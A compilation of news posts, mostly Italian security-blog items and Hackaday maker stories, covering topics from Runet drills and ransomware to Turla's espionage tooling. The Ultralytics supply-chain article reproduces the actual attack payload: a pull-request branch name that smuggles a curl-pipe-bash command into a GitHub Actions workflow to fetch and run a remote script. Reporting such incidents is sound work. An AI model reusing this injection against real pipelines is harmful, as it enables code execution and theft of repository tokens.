Recentemente a Roma, presso il Centro Operativo DIA, si è tenuto un meeting della Rete @ON (Antimafia Operational Network) con i rappresentanti delle Forze di Polizia di Belgio, Germania, Francia, Paesi Bassi, Spagna ed EUROPOL che unitamente, all’Italia rappresentano il Core Group del Network.

La DIA (Direzione Investigativa Antimafia) sostiene con impegno l’azione di contrasto internazionale alle mafie, anche attraverso una mirata attività di cooperazione di Polizia per il contrasto del fenomeno transnazionale delle più pericolose organizzazioni criminali.

Il recente evento romano riveste un particolare valore simbolico in quanto ricaduto a 10 anni esatti dall’istituzione della Rete @ON, con la risoluzione del 4 dicembre 2014 del Consiglio dell’Unione Europea, promossa dalla DIA, quale risultato del Dipartimento della Pubblica Sicurezza nel corso del Semestre di Presidenza italiana di turno.

Lo scopo della Rete @ON è quello di rafforzare la cooperazione delle Forze di Polizia contro i principali gruppi della criminalità organizzata, anche di tipo mafioso, che hanno un impatto sulla sicurezza dei cittadini europei.

I gruppi criminali sottoposti ad attenzione sono italiani, di etnia albanese, euroasiatici, bande di motociclisti, ma anche quelli emergenti (Moccro Maffie, nigeriane ed altre) che pongono un serio rischio per la sicurezza e l’economia dell’UE.

La DIA ha promosso, ottenuto e gestito – quale leader dell’iniziativa – progressivi finanziamenti della Commissione UE per sostenere le attività operative delle 51 Agenzia di Polizia che aderiscono al Network in rappresentanza di 44 Paesi.

Ad oggi il Network sta supportando le Unità investigative partner in 216 investigazioni e ha finanziato 617 missioni in favore di oltre 2.500 investigatori che hanno portato all’arresto di 1.068 persone, inclusi 15 latitanti oltre al sequestro di circa 271 milioni di euro, droga, veicoli, beni di lusso ed armi.

We tinkerers often have ideas we know are crazy, and we make them up in the most bizarre places, too. For example, just imagine hosting a website while pedaling across the world—who would (not) want that? Meet [Jelle Reith], a tinkerer on an epic cycling adventure, whose bicycle doubles as a mobile web server. [Jelle]’s project, jelle.bike, will from the 6th of December on showcase what he’s seeing in real time, powered by ingenuity and his hub dynamo. If you read this far, you’ll probably guess: this hack is done by a Dutchman. You couldn’t be more right.

At the heart of [Jelle]’s setup is a Raspberry Pi 4 in a watertight enclosure. The tiny powerhouse runs off energy generated by a Forumslader V3, a clever AC-to-DC converter optimized for bike dynamos. The Pi gets internet access via [Jelle]’s phone hotspot, but hosting a site over cellular networks isn’t as simple as it sounds. With no static IP available, [Jelle] routes web traffic through a VPS using an SSH tunnel. This crafty solution—expanded upon by Jeff Geerling—ensures seamless access to the site, even overcoming IPv6 quirks.

The system’s efficiency and modularity exemplify maker spirit: harnessing everyday tools to achieve the extraordinary. For more details, including a parts list and schematics, check out [Jelle]’s Hackaday.io project page.

hackaday.com/2024/12/08/pedali…

Recently a company called Z-Polymers introduced its new Tullomer FDM filament that comes with a lofty bullet list of purported properties that should give materials like steel, aluminium, and various polymers a run for their money. Even better is that it is compatible with far lower specification FDM printers than e.g. PEEK. Intrigued, the folks over at All3DP figured that they’d should get some hands-on information on this filament and what’s it like to print with in one of the officially sanctioned Bambu Lab printers: these being the X1C & X1CE with manufacturer-provided profiles.

The world of engineering-grade FDM filaments has existed for decades, with for example PEEK (polyether ether ketone) having been around since the early 1980s, but these require much higher temperatures for the extruder (360+℃) and chamber (~90℃) than Tullomer, which is much closer (300℃, 50℃) to a typical high-performance filament like ABS, while also omitting the typical post-process annealing of PEEK. This assumes that Tullomer can match those claimed specifications, of course.

One of the current users of Tullomer is Erdos Miller, an engineering firm with a focus on the gas and oil industry. They’re using it for printing parts (calibration tooling) that used to be printed in filaments like carbon fiber-reinforced nylon (CF-PA) or PEEK, but they’re now looking at using Tullomer for replacing CF-PA and machined PEEK parts elsewhere too.

It’s still early days for this new polymer, of course, and we don’t have a lot of information beyond the rather sparse datasheet, but if you already have a capable printer, a single 1 kg spool of Tullomer is a mere $500, which is often much less or about the same as PEEK spools, without the requirement for a rather beefy industrial-strength FDM printer.

hackaday.com/2024/12/08/new-tu…

Il 6 dicembre in Daghestan sono state registrate interruzioni nel funzionamento dei servizi online stranieri, tra cui WhatsApp, Telegram e YouTube. Il motivo è stato un esercizio di Roskomnadzor (Il Servizio federale per la supervisione delle comunicazioni, della tecnologia dell’informazione e dei mass media della federazione russa), nell’ambito del quale sono stati testati scenari per disabilitare l’accesso al segmento straniero di Internet.

Il provider Ellco ha riferito che dalle 16:00 l’accesso a una serie di servizi era limitato.

“Caro abbonato, in connessione con gli esercizi in corso di Roskomnadzor per testare scenari per disabilitare l’accesso al segmento straniero di Internet, oggi, 6 dicembre 2024, dalle 16:00, ci sono restrizioni all’accesso ad alcuni siti e servizi. (WhatsApp, ecc.) Purtroppo non possiamo influenzare questa situazione. Tempo di recupero stimato, 16:00 del 7/12/2024.”

Roskomnadzor ha spiegato a Kommersant che le esercitazioni hanno lo scopo di determinare l’efficacia della “infrastruttura di sostituzione delle chiavi” in caso di chiusura deliberata del segmento Internet russo dall’esterno. Inoltre, vengono individuati i sistemi informativi le cui prestazioni dipendono dalla comunicazione con servizi, biblioteche e altre risorse situate in reti di comunicazione straniere.

“Lo scopo dell’esercitazione è confermare la disponibilità dell’infrastruttura Internet russa a controllare i principali servizi stranieri e russi in caso di deliberata influenza esterna“, ha affermato l’RKN.

All’inizio di novembre, sui canali Telegram ha cominciato a circolare una lettera inviata dalla Banca Centrale alle banche russe, in cui si affermava che Roskomnadzor intende condurre esercizi a dicembre “per disabilitare l’accesso al segmento estero di Internet in alcune regioni”.

Quindi il dipartimento ha spiegato che la verifica della disponibilità dei sistemi chiave per garantire la sostenibilità della Runet viene effettuata annualmente, il programma per la loro attuazione è approvato dal Ministero dello sviluppo digitale della Russia in accordo con l’FSB della Russia e Roskomnadzor. “I controlli non influiscono sull’accesso a Internet degli utenti russi“, ha riferito RKN.

L'articolo Muri digitali in Azione: esercitazioni Runet in Daghestan per isolare l’Internet russo dal mondo proviene da il blog della sicurezza informatica.

What if your keychain could tell you the temperature, all while staying battery-free? That’s the essence of this innovative keychain ‘NFC_temp’ by [bjorn]. This nifty gadget harnesses energy from an NFC field—like the one created by your smartphone—to power itself just long enough to take a precise temperature reading. Using components like an ATTiny1626 microcontroller, a TMP117 thermometer, and an RF430CL330H NFC IC, NFC_temp cleverly stores harvested power in a capacitor to function autonomously.

The most impressive part? This palm-sized device (18×40 mm) uses a self-designed 13.56 MHz antenna to draw energy from NFC readers. The temperature is then displayed on the reader, with an impressive accuracy of ±0.1 °C. Creator [bjorn] even shared challenges, like switching from an analog sensor due to voltage instability, which ultimately led to his choice of the TMP117. Android phones work best with the tag, while iOS devices require a bit more angling for reliable detection.

Projects like NFC_temp underscore the creativity within open source. It’s a brilliant nod to the future of passive, wireless, energy-efficient designs. Since many of us will all be spending a lot of time around the Christmas tree this month, why not fit it in a bauble?

hackaday.com/2024/12/08/tiny-n…

È stato attaccato il repository della libreria Python Ultralytics, ampiamente utilizzata nelle attività di visione artificiale. Approfittando di questa vulnerabilità, i criminali informatici hanno pubblicato versioni dannose della libreria su PyPI, progettate per il mining di criptovalute.

La vulnerabilità era associata al pacchetto ultralytics-actions, che automatizza l’avvio di gestori per determinate azioni nel repository. Questo è lo scopo per cui viene utilizzato il meccanismo GitHub Actions. Nel progetto Ultralytics, il gestore collegato all’evento pull_request_target ha chiamato il file format.yml per formattare il codice nelle richieste pull in entrata. Questo file eseguiva comandi shell con modelli di caratteri jolly come:

git pull origin ${{ github.head_ref || github.ref }}

git config –global utente.nome “${{ input.github_nomeutente }}”

git config –global user.email “${{ input.github_email }}”

Gli aggressori hanno inviato una richiesta pull al repository Ultralytics, specificando la seguente riga come nome del ramo:

openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}bash)

Ciò ha comportato l’esecuzione del comando:

curl -sSfL raw.githubusercontent.com/…/file.sh | bash

Di conseguenza, gli aggressori hanno avuto accesso ai token del repository e ad altri dati riservati. Si ritiene che abbiano modificato il gestore di pubblicazione per rimuovere la verifica dell’account autorizzato a pubblicare versioni su PyPI e abbiano utilizzato la tecnica di avvelenamento della cache di build di GitHub Actions per inserire i propri dati nella versione.

La prima versione dannosa di Ultralytics, versione 8.3.41, è stata pubblicata su PyPI il 4 dicembre alle 23:51 (MSK) ed eliminata alle 12:15 del giorno successivo. Alle 15:47 è stata pubblicata un’altra versione 8.3.42, che è stata rimossa alle 16:47. Pertanto le versioni dannose sono rimaste disponibili per il download per circa 13 ore. Queste versioni contenevano codice che scaricava il componente di mining XMRig da un server esterno.

Gli sviluppatori hanno risolto rapidamente il problema e hanno rilasciato le versioni correttive 8.3.43 e 8.3.44. Due giorni dopo, però, gli aggressori hanno nuovamente pubblicato le versioni dannose 8.3.45 e 8.3.46, che contenevano un codice diverso. Fino al completamento dell’indagine, si consiglia agli utenti di astenersi dall’installare nuove versioni e di impegnare la versione 8.3.44 come dipendenze.

L'articolo Supply Chain Sotto Attacco! La Libreria Python Ultralytics è stata violata proviene da il blog della sicurezza informatica.

The widely quoted carrot factoid that the vegetable’s orange colour is the result of patriotic Dutch farmers breeding them that way may be an urban myth, but it’s certainly true that they can pass an audio signal in a time of need. [Julian Krause] follows up on a Reddit meme of a carrot being used to join two phono plugs, and appears to find the organic interconnect to be of good quality.

We had to admit a second look at a calendar to be sure that it’s not April 1st, but while his manner is slightly tongue in cheek it seems he’s really characterising the audio performance of a carrot. What he finds is a bit of attenuation, some bass cut, and an intrusion of RF interference pickup, but surprisingly, not a bad distortion figure.

Of course, we’re guessing the real point of the exercise is to poke fun at the world of excessive hi-fi equipment, something we’ve been only too glad to have a go at ourselves from time to time. But if the tests are to be taken at face value it seems that in a pinch, a carrot will do as a means to hook together line level audio cables, no doubt lending a sweet and crunchy overtone to the result. The video is below the break, for your entertainment.

youtube.com/embed/_bV1sfQQkZY?…

hackaday.com/2024/12/08/the-au…

Have you ever dreamt of developing games that run on practically anything, from a modern browser to a microcontroller? Enter WASM-4, a minimalist fantasy console where constraints spark creativity. Unlike intimidating behemoths like Unity, WASM-4’s stripped-back specs challenge you to craft games within its 160×160 pixel display, four color palette, and 64 KB memory. Yes, you’ll curse at times, but as every tinkerer knows, limitations are the ultimate muse.

Born from the WebAssembly ecosystem, this console accepts “cartridges” in .wasm format. Any language that compiles to WebAssembly—be it Rust, Go, or AssemblyScript—can build games for it. The console’s emphasis on portability, with plans for microcontroller support, positions it as a playground for minimalist game developers. Multiplayer support? Check. Retro vibes? Double-check.

Entries from a 2022’s WASM-4 Game Jam showcase this quirky console’s charm. From pixel-perfect platformers to byte-sized RPGs, the creativity is staggering. One standout, “WasmAsteroids,” demonstrated real-time online multiplayer within these confines—proof that you don’t need sprawling engines to achieve cutting-edge design. This isn’t just about coding—it’s about coding smart. WASM-4 forces you to think like a retro engineer while indulging in modern convenience.

WASM-4 is a playground for anyone craving pure, unadulterated experimentation. Whether you’re a seasoned programmer or curious hobbyist, this console has the tools to spark something great.

hackaday.com/2024/12/08/wasm-4…

Il colosso britannico delle telecomunicazioni BT Group ha dovuto affrontare un tentativo di attacco informatico contro una delle divisioni della sua vecchia struttura aziendale. Il gruppo di hacker Black Basta ha rivendicato l’incidente. Il gruppo ha pubblicato il nome dell’azienda sul proprio sito web, ma in realtà l’obiettivo dell’attacco era molto più modesto: la divisione BT Conferencing, con sede nel Massachusetts.

BT Group ha confermato che l’attacco ha preso di mira alcuni elementi della piattaforma BT Conferencing, che sono stati immediatamente rimossi e isolati. Secondo la società, i server interessati non influiscono sui servizi di conferenza BT, che rimangono pienamente operativi. Nessun altro servizio del gruppo o dato dei clienti è stato compromesso. Le indagini sull’incidente continuano in collaborazione con le autorità di regolamentazione e le forze dell’ordine.

Black Basta afferma di aver rubato circa 500 GB di dati, inclusi file finanziari, accordi di riservatezza, informazioni sugli utenti e altri documenti. Tra i campioni sul sito web del gruppo ci sono scansioni di carte d’identità, documenti di visto e informazioni sui bonus dei dipendenti. Tuttavia, la maggior parte del materiale sembra provenire dall’ultimo decennio.

Black Basta, che ha iniziato a operare come modello Ransomware-as-a-Service ( RaaS ) nell’aprile 2022, ha attaccato una serie di grandi obiettivi, tra cui la società di difesa tedesca Rheinmetall, la società svizzera di robotica ABB e la società britannica di outsourcing tecnologico Capita.

Secondo l’FBI e la CISA, gli affiliati di Black Basta hanno attaccato più di 500 organizzazioni tra aprile 2022 e maggio 2024 . Il gruppo ha inoltre crittografato e rubato dati da almeno 12 dei 16 settori infrastrutturali critici.

Dopo che il sindacato del crimine informatico Conti ha cessato le sue attività nel maggio 2022, si è diviso in diversi gruppi, uno dei quali si ritiene sia diventato Black Basta. Una ricerca condotta da Elliptic e Corvus Insurance mostra che il ransomware ha ricevuto almeno 100 milioni di dollari in riscatti da più di 90 vittime (a novembre 2023). Va notato che il gruppo ha attaccato almeno 20 vittime nelle prime 2 settimane di lavoro.

L'articolo Black Basta Colpisce BT Group: 500 GB di Dati Rubati e Pubblicati proviene da il blog della sicurezza informatica.

Esistono molte opzioni di cavi USB-C sul mercato, dai modelli economici che costano pochi dollari a quelli premium che costano oltre i 100. Il costo dipende dalla lunghezza, dalla qualità costruttiva, dal rispetto degli standard USB-C e dal marchio. Sebbene USB-C sia stato creato per semplificare la connessione dei dispositivi, si è rivelato uno standard abbastanza complesso che richiede la conoscenza delle sue funzionalità. Lo scopo principale di USB-C è combinare trasferimento dati, audio, video e ricarica in un unico cavo.

Tuttavia, le specifiche dei cavi USB-C variano notevolmente e la confezione spesso non fornisce informazioni complete sulle loro capacità. Inoltre, USB-C può comportare rischi per la sicurezza a causa dell’elettronica nascosta incorporata.

Anche se i cavi hanno un aspetto simile, la loro struttura interna può variare notevolmente. Gli esempi includono i cavi Thunderbolt 4 da 129 dollari di Apple, che utilizzano elettronica attiva complessa, e i semplici cavi Basics da 11,69 dollari di Amazon, che non utilizzano nemmeno tutti i pin del connettore USB-C. Attrezzature moderne come gli scanner industriali possono identificare le differenze di progettazione.

Di particolare interesse è il cavo O.MG, sviluppato per la ricerca sulla sicurezza. Sembra un normale cavo USB-C, ma al suo interno si nasconde un’elettronica in grado di intercettare dati, iniettare codice dannoso e persino registrare le sequenze di tasti. I metodi di test standard non sono sufficienti per rilevare tali minacce. Ad esempio, per identificare strutture di cavi complesse erano necessarie la scansione 3D e la visualizzazione dettagliata.

La questione della sicurezza del cavo USB-C sta diventando sempre più rilevante. I moderni metodi di verifica, come la scansione TC, sono già utilizzati per prevenire attacchi durante le fasi di produzione delle apparecchiature. Un esempio delle gravi conseguenze delle vulnerabilità nella catena di fornitura è il caso dell’utilizzo di dispositivi modificati in Libano che hanno attaccato gli Hezbollah.

Per gli utenti comuni il rischio rimane minimo, poiché i cavi specializzati come O.MG o EvilCrow Wind sono costosi e difficili da trovare. Tuttavia, per protezione, si consiglia di utilizzare cavi USB-C certificati ed evitare l’uso di porte di ricarica pubbliche.

Cos’è una sanzione TC

La scansione TC è un acronimo che si riferisce alla Tomografia Computerizzata (o TAC, Tomografia Assiale Computerizzata). È una tecnica di imaging avanzata che utilizza i raggi X per creare immagini tridimensionali dettagliate di un oggetto o un organismo, combinando una serie di immagini bidimensionali prese da diverse angolazioni.

Come Funziona

1. Emissione di Raggi X: La macchina emette un fascio di raggi X che attraversa l’oggetto o il corpo.
2. Raccolta dei Dati: I sensori rilevano l’intensità dei raggi X che emergono dall’altra parte, variando in base alla densità dei materiali attraversati.
3. Elaborazione Computerizzata: Un computer elabora queste informazioni per generare immagini dettagliate in sezioni (slice) o in 3D.

Applicazioni della Scansione TC

• Medicina: È comunemente usata per diagnosticare malattie, traumi o anomalie interne.
• Industria e Sicurezza: Può essere utilizzata per analizzare la struttura interna di dispositivi e materiali senza danneggiarli, come nel caso dei cavi USB-C analizzati per scoprire elettronica nascosta o vulnerabilità.
• Ricerca sulla Sicurezza Informatica: Nel contesto citato, la scansione TC permette di rilevare componenti elettronici nascosti all’interno di cavi USB-C che sembrano normali, identificando eventuali minacce come microchip o trasmettitori.

È una tecnica molto utile per ispezioni non distruttive e per individuare dettagli che altrimenti non sarebbero visibili con metodi tradizionali.

L'articolo Il Cavo USB E’ sicuro? La Tomografia Computerizzata TC è il futuro nella Supply-chain proviene da il blog della sicurezza informatica.

Nasce a New York Sammy Davis, Jr., cantante, ballerino e intrattenitore.

materialious.nadeko.net/watch/…

@Storia
#otd
#accaddeoggi

Typically, if you want to build an FPGA project inside a PC, you’d need a fairly expensive development board that plugs into the bus. However, [CircuitValley] found some IBM RS-485 boards that are little more than a PCIe board with an Intel FPGA onboard. These are widely avaiable on the surplus market for around $20 shipped. He’s been documenting how to use them.

The FPGA onboard is a Cyclone IV with about 21,000 logic elements and a little over 750 kbits of memory. The board itself has configuration memory, power management, and a few connectors. The JTAG header is unpopulated, but the footprint is there. You simply need to supply a surface-mount pin header and an external JTAG probe, and you can program. Even if you aren’t interested in using an FPGA board, the reverse engineer steps are fun to watch.

The situation reminds us a little of the RTL-SDR — when a device uses a programmable device to perform nearly all of its functions, it is subject to your reprogramming. What would you do with a custom PCIe card? You tell us. Need a refresher on the bus? We can help. Thinking of building some sort of FPGA accelerator? Maybe try RIFFA.

youtube.com/embed/8liWiCM8JM4?…

hackaday.com/2024/12/07/cheap-…

A good source of hackable home automation parts has come for a while in the form of inexpensive modules offered by large retailers such as Lidl, or IKEA. They’re readily available and easy to play with, they work with open source hubs, so what’s not to like! As an example, [Circuit Valley] has an IKEA Vallhorn motion sensor for a teardown, it’s as you might expect, a passive infrared sensor (PIR) sensor coupled with a Zigbee interface.

Inside the ultrasonic welded case is a small PCB and a Fresnel lens on the inside of the top cover, and a small PCB for the electronics. We applaud the use of a Swiss Army knife can opener as a spudger. The interesting part comes in identifying the individual components: the Silicon Labs EFR32MG21 SoC is easy enough, but another mystery 8-pin chip is more elusive. The part number suggests an Analog Devices op-amp for signal conditioning the PIR output, but the pinout seems not to support it and from here we think it’s too expensive a part for a budget item like this.

There’s a handy header for talking to the SoC, which we’d love to report is open and ready to be hacked, but we’re not getting too optimistic. Even if not hackable though, we’re guessing many of you find uses for these things.

youtube.com/embed/Z-XqmBRw9r8?…

hackaday.com/2024/12/07/a-look…

Playing chess has always been a bellwether for computers. The game isn’t trivial, but the rules are managably simple. However, the game is too complex to be easily solved entirely, so you have to use tricky software to play a credible game. Big computers do have an advantage, of course. But Microchess — arguably the first commercial game for home computers — was able to play on tiny machines like the Kim-1. [Joachim Froholt] interviewed [Peter Jennings] — the man behind Microchess to learn the whole story of its creation.

In 1960, [Jennings] was ten years old and had to persuade the local librarian to let him read adult books on electronics and computers. Five years later, a ham radio teletype and some circuitry helped him practice chess openings and was the first of many chess-playing machines he’d build or program.

Microchess itself took six months of painstaking programming, entering hex codes into the computer. Word leaked out from a user’s group meeting (where Microchess beat a human player), and [Jennings] was swamped with requests for the program. In late 1976, the program was offered for sale as a teletype listing or, for an extra $3, a cassette tape.

The program went on to be very successful and moved to other platforms. Commodore even made a special dedicated device based on the Kim-1 to play Microchess, a piece of hardware unique enough that [Michael Gardi] honored it with one of his phenomenal replicas.

hackaday.com/2024/12/07/microc…

We were recently notified by a reader that [Tom Evans] had filed a copyright claim against [Mark]’s repair video on his Mend it Mark YouTube channel, taking down said repair video as well as [Mark]’s delightful commentary. In a new video, [Mark] comments on this takedown and the implications. The biggest question is what exactly was copyrighted in the original video, which was tough because YouTube refused to pass on [Mark]’s questions or provide further details.

In this new video the entire repair is summarized once again using props instead of the actual pre-amp, which you can still catch a glimpse of in our earlier coverage of the repair. To summarize, there was one bad tantalum capacitor that caused issues for one channel, and the insides of this twenty-five thousand quid pre-amp looks like an artistic interpretation of a Jenga tower using PCBs. We hope that this new video does stay safe from further copyright strikes from an oddly vengeful manufacturer after said manufacturer event sent the defective unit to [Mark] for a repair challenge.

Since this purportedly ‘audiophile-level’ pre-amplifier uses no special circuits or filtering – just carefully matched opamps – this is one of those copyright strike cases that leave you scratching your head.

youtube.com/embed/yPIrCaeVtvI?…

hackaday.com/2024/12/07/the-25…

What do scanning electron microscopes and satellites have in common? On the face of things, not much, but after seeing [Zachary Tong]’s latest video on liquid metal ion thrusters, we see that they seem to have a lot more in common than we’d initially thought.

As you’d expect with such a project, there were a lot of false starts and dead ends. [Zach] started with a porous-emitter array design, which uses a sintered glass plate with an array of tiny cones machined into it. The cones are coated in a liquid metal — [Zach] used Galinstan, an alloy of gallium, indium, and tin — and an high voltage is applied between the liquid metal and an extraction electrode. Ideally, the intense electric field causes the metal to ionize at the ultra-sharp tips of the cones and fling off toward the extraction electrode and into the vacuum beyond, generating thrust.

Getting that working was very difficult, enough so that [Zach] gave up and switched to a slot thruster design. This was easier to machine, but alas, no easier to make work. The main problem was taming the high-voltage end of things, which seemed to find more ways to produce unwanted arcs than the desired thrust. This prompted a switch to a capillary emitter design, which uses a fine glass capillary tube to contain the liquid metal. This showed far more promise and allowed [Zach] to infer a thrust by measuring the tiny current created by the ejected ions. At 11.8 μN, it’s not much, but it’s something, and that’s the thing with ion thrusters — over time, they’re very efficient.

To be sure, [Zach]’s efforts here didn’t result in a practical ion thruster, but that wasn’t the point. We suspect the idea here was to explore the real-world applications for his interests in topics like electron beam lithography and microfabrication, and in that, we think he did a bang-up job with this project.

youtube.com/embed/dfYSBlV90NQ?…

hackaday.com/2024/12/07/liquid…

’Tis the season for soldering! At least at my house. My son and I made some fairly LED-laden gifts for the immediate relatives last year, and he’s got the blinky bug. We were brainstorming what we could make this year, and his response was “I don’t care, but it needs to have lots of LEDs”.

It’s also the season for reverse engineering, apparently, because we’re using a string of WS2812-alike “fairy lights”. These are actually really neat, they look good and are relatively cheap. It’s a string of RGB LEDs with drivers, each dipped in epoxy, and run on a common three-enameled-wire bus. Unlike WS2812s, which pass the data on to the next unit in the line and then display them with a latching pulse at the end of a sequence, these LED drivers seem to count how many RGB packets have been sent down the wire, and only respond to their own number.

This means that if you cut up a string of 200 LEDs, it behaves like a string of 200 WS2812s. But if you cut say 10 LEDs off the string, where you cut them matters. If you cut it off the front of the string, you only have to send 10 color packets. If you cut them off the other end, you need to send 290 dummy packets before they even start listening. Bizarre, but ’tis the season for bizarre hacks.

And finally, ’tis the season for first steps into “software architecture”. Which is to say that my son is appreciating functions for the first time in his life. Controlling one LED is easy, but making a light show is about two more abstraction layers on top of that. We’ve been having fun making them dim, twinkle, and chase so far. We only have two more weekends, though, and we don’t have a final light show figured out yet, but after all, ’tis the season for last minute present hacking.

This article is part of the Hackaday.com newsletter, delivered every seven days for each of the last 200+ weeks. It also includes our favorite articles from the last seven days that you can see on the web version of the newsletter. Want this type of article to hit your inbox every Friday morning? You should sign up!

hackaday.com/2024/12/07/tis-th…

If one has a multi-material printer there are more options than simply printing in different colors of the same filament. [Thomas Sanladerer] explores combinations of different filaments in a fantastic article that covers not just which materials make good removable support interfaces, but also which ones stick to each other well enough together to make a multi-material print feasible. He tested an array of PLA, PETG, ASA, ABS, and Flex filaments with each in both top (printed object) and bottom (support) roles.
A zero-clearance support where the object prints directly on the support structure can result in a very clean bottom surface. But only if the support can be removed easily.
People had already discovered that PETG and PLA make pretty good support for each other. [Thomas] expands on this to demonstrate that PLA doesn’t really stick very well to anything but itself, and PETG by contrast sticks really well to just about anything other than PLA.

One mild surprise was that flexible filament conforms very well to PLA, but doesn’t truly stick to it. Flex can be peeled away from PLA without too much trouble, leaving a very nice finish. That means using flex filament as a zero-clearance support interface — that is to say, the layer between the support structure and the PLA print — seems like it has potential.

Flex and PETG by contrast pretty much permanently weld themselves together, which means that making something like a box out of PETG with a little living hinge section out of flex would be doable without adhesives or fasteners. Ditto for giving a PETG object a grippy base. [Thomas] notes that flexible filaments all have different formulations, but broadly speaking they behave similarly enough in terms of what they stick to.

[Thomas] leaves us with some tips that are worth keeping in mind when it comes to supported models. One is that supports can leave tiny bits of material on the model, so try to use same or similar colors for both support and model so there’s no visual blemish. Another tip is that PLA softens slightly in hot water, so if PLA supports are clinging stubbornly to a model printed in a higher-temperature material like PETG or ABS/ASA, use some hot water to make the job a little easier. The PLA will soften first, giving you an edge. Give the video below a watch to see for yourself how the combinations act.

youtube.com/embed/5VV2fbJ0apg?…

hackaday.com/2024/12/07/printi…

La recente scoperta dell’operazione Snowblind, condotta dal gruppo russo Turla (noto anche come Secret Blizzard), ha rivelato una strategia di spionaggio cibernetico particolarmente sofisticata. Turla è riuscito a compromettere le infrastrutture di comando e controllo (C2) di altri gruppi di cybercriminali, utilizzandole per distribuire i propri malware e raccogliere informazioni sensibili. Questa tattica non solo complica l’attribuzione degli attacchi, ma amplia anche le capacità operative del gruppo, permettendo di sfruttare piattaforme già esistenti.

Una Campagna di Infiltrazione Complessa

Secondo un rapporto del team Black Lotus Labs di Lumen Technologies, Turla ha compromesso 33 nodi C2 utilizzati dal gruppo pakistano Storm-0156, associato a cluster di attività come SideCopy e Transparent Tribe. L’operazione, durata circa due anni, ha permesso a Turla di sfruttare l’accesso preesistente di Storm-0156 per distribuire i propri malware, tra cui TwoDash e Statuezy, in reti legate a entità governative afghane. Nell’aprile 2023, Turla ha ulteriormente ampliato le proprie operazioni penetrando nelle workstation degli operatori pakistani, ottenendo potenzialmente una vasta gamma di dati, tra cui strumenti di Storm-0156, credenziali per C2 e reti bersaglio, nonché dati esfiltrati da operazioni precedenti.

Collaborazione e Mitigazione

Lumen Technologies ha collaborato con il Microsoft Threat Intelligence Team (MSTIC) per monitorare e mitigare questa minaccia. Il rapporto di Lumen è stato pubblicato in concomitanza con un blog di MSTIC che fornisce ulteriori approfondimenti su questi eventi.

I Gruppi Coinvolti

• Turla (Secret Blizzard): Gruppo di cyber spionaggio altamente sofisticato, operativo dagli anni ’90, noto per attacchi a governi, entità militari e il settore della difesa. Utilizza tecniche avanzate per compromettere reti, esfiltrare dati sensibili e mantenere la persistenza all’interno degli ambienti target.
• Transparent Tribe (APT36): Gruppo sospettato di avere base in Pakistan, attivo almeno dal 2013, che prende di mira organizzazioni diplomatiche, della difesa e della ricerca in India e Afghanistan. Utilizza malware come CrimsonRAT e ha una storia di attacchi sofisticati.
• SideCopy: Gruppo APT che imita le tattiche di Sidewinder, noto per attacchi contro l’India, utilizzando file LNK malevoli e catene di infezione complesse. Ha legami con Transparent Tribe e condivide infrastrutture e codice per attacchi coordinati.

La capacità di Turla di compromettere le infrastrutture di altri gruppi per raggiungere i propri obiettivi sottolinea la complessità e l’interconnessione del panorama delle minacce informatiche. Questa strategia non solo permette a Turla di ampliare la propria portata, ma complica anche gli sforzi di attribuzione e difesa da parte delle organizzazioni bersaglio. La collaborazione tra aziende di cybersecurity, come Lumen Technologies e Microsoft, è cruciale per identificare e mitigare tali minacce. Tuttavia, l’evoluzione continua delle tattiche utilizzate da gruppi come Turla richiede una vigilanza costante e l’adozione di misure di sicurezza proattive da parte delle organizzazioni potenzialmente a rischio.

Analisi del Flusso di Attacco

L’immagine che mappa il flusso di attacco di Turla illustra chiaramente i legami tra gli attori coinvolti, i malware utilizzati e i paesi presi di mira. Quattro sono i principali bersagli geografici: India, Pakistan, Afghanistan e la regione storica del British Indian Subcontinent. Gli obiettivi rientrano prevalentemente nelle categorie governative e del settore difesa, sottolineando il focus di Turla sulla raccolta di informazioni strategiche e militari.

In termini di strumenti, Turla ha fatto ampio uso di malware diversificati:

• CrimsonRAT: Un malware già utilizzato da Storm-0156 per attacchi contro l’India.
• TwoDash e Statuezy: Sviluppati internamente dal gruppo russo per eseguire operazioni mirate.
• Waiscot: Utilizzato come strumento secondario di compromissione.

La strategia del gruppo si basa su tecniche avanzate di spionaggio, come la raccolta di credenziali (credential dumping) e il controllo remoto delle macchine compromesse, spesso sfruttando infrastrutture già operative per nascondere le proprie tracce.

La Backdoor

Un recente studio pubblicato da Hybrid Analysisha fornito una visione dettagliata di uno degli strumenti più avanzati utilizzati dal gruppo Turla, un backdoor fileless progettato per infiltrarsi e mantenere l’accesso ai sistemi compromessi con tecniche di evasione estremamente sofisticate. Questa nuova variante, scoperta in una delle campagne attribuite a Turla, evidenzia il costante adattamento del gruppo alle moderne difese informatiche.

Tecniche di infezione e distribuzione

• Turla ha utilizzato file di collegamento (.lnk), una metodologia già vista in campagne precedenti, per distribuire la backdoor nei sistemi target. I file LNK rappresentano un modo discreto per avviare l’esecuzione del malware, sfruttando spesso tecniche di ingegneria sociale per indurre gli utenti a interagire con essi.
• Una volta attivato, il payload non scrive dati su disco, operando completamente in memoria (fileless). Questo approccio rende la rilevazione particolarmente difficile per i software di sicurezza tradizionali.

Capacità e funzionalità del backdoor

• Il malware è in grado di eseguire comandi personalizzati, inclusi:
  
  • L’esecuzione di script PowerShell malevoli per il controllo remoto.
  • La creazione o modifica di file per espandere le capacità operative o compromettere ulteriormente i sistemi.
  • La raccolta di dati sensibili attraverso tecniche di keylogging o esfiltrazione diretta.

  
  

• Supporta tecniche di anti-forensics, che includono:
  
  • La disabilitazione di Event Tracing for Windows (ETW) e Anti-Malware Scan Interface (AMSI) per ostacolare il monitoraggio e l’analisi da parte degli strumenti di sicurezza.
  • Unhooking di API Windows, una tecnica avanzata per bypassare i meccanismi di monitoraggio dei software di sicurezza.

  
  

Evasione e resilienza

• Una delle caratteristiche più avanzate di questa backdoor è la sua capacità di mimetizzarsi all’interno del traffico legittimo della rete, utilizzando protocolli standard per comunicare con i server di comando e controllo (C2).
• La backdoor è stata progettata per autonomamente disattivare funzioni di sicurezza integrate nei sistemi Windows, aumentando le possibilità di rimanere inosservata per lunghi periodi.

